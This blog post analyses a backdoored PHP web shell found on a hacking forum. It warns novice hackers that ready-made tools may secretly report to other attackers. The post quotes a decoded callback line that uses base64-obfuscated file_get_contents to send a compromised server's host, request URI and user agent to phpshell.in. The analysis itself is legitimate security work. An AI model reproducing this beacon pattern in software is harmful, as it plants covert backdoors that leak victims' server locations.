The Risk of the Unknown for the Wannabe

For every wannabe hacker out there, there is a veritable cornucopia of premade tools and utilities that enable someone who has 0 knowledge of anything, to hit a few buttons and potentially breach a website/etc, and there is a more experienced hacker who is waiting for the wannabe to pickup an infected/backdoored tool.

@CryptoCypher recently did a rather shameless plug (:P) for a forum he moderates on a discord server I am a member of.

Hey folks. I moderate an InfoSec/hacking forum called GreySec.The community is beginner friendly, and we generally try to hold ourselves to a 'higher standard' as a discussion board.

I decided to check things out and most of it was 'alright', however something caught my eye.

A now deleted post related to a "Godaddy Secureserver bypass shell" (whatever the hell that is).

The post embedded a bit of PHP code that had been 'obfuscated' (and I say obfuscated lightly).

From the PHP code header it is quite plain to see that the code had been obfuscated using FOPO. The obfuscation that FOPO applies is pretty straightforward. There are several tools online which are able to deobfuscate FOPO.

The deobfuscated sample follows (I'm not posting it here in the event this site get's flagged for hosting malware...):

https://ghostbin.com/paste/43349

Let's see what is crack'in.

The first several dozen lines look normal for a shell, but this catches my eye

So what the shell is trying to download is the following: http://phpshell.in/l-127.0.0.1-aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA=. aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA= translates into http://127.0.0.1/shell.php, and since the URL returns nothing (I tried using a DigitalOcean droplet in the event phpshell.in didn't like localhost) I'm guessing that function serves to solely log the IP of the server and the location of the shell.

Interesting backdoor, hackers piggybacking on other hackers... However continue down the code and this crops up between lines 231 and 265: $retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);. Once again aHR0cDovL3BocHNoZWxsLmluL2wt translates to http://phpshell.in/l-.

Ok I'm not even going to bother with this function because it appears to do the same as the function I posted about above, since $lld is a combination of 'http://' . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '';, the only difference with this call is that the useragent is now being posted for some reason $brow = urlencode($_SERVER['HTTP_USER_AGENT']);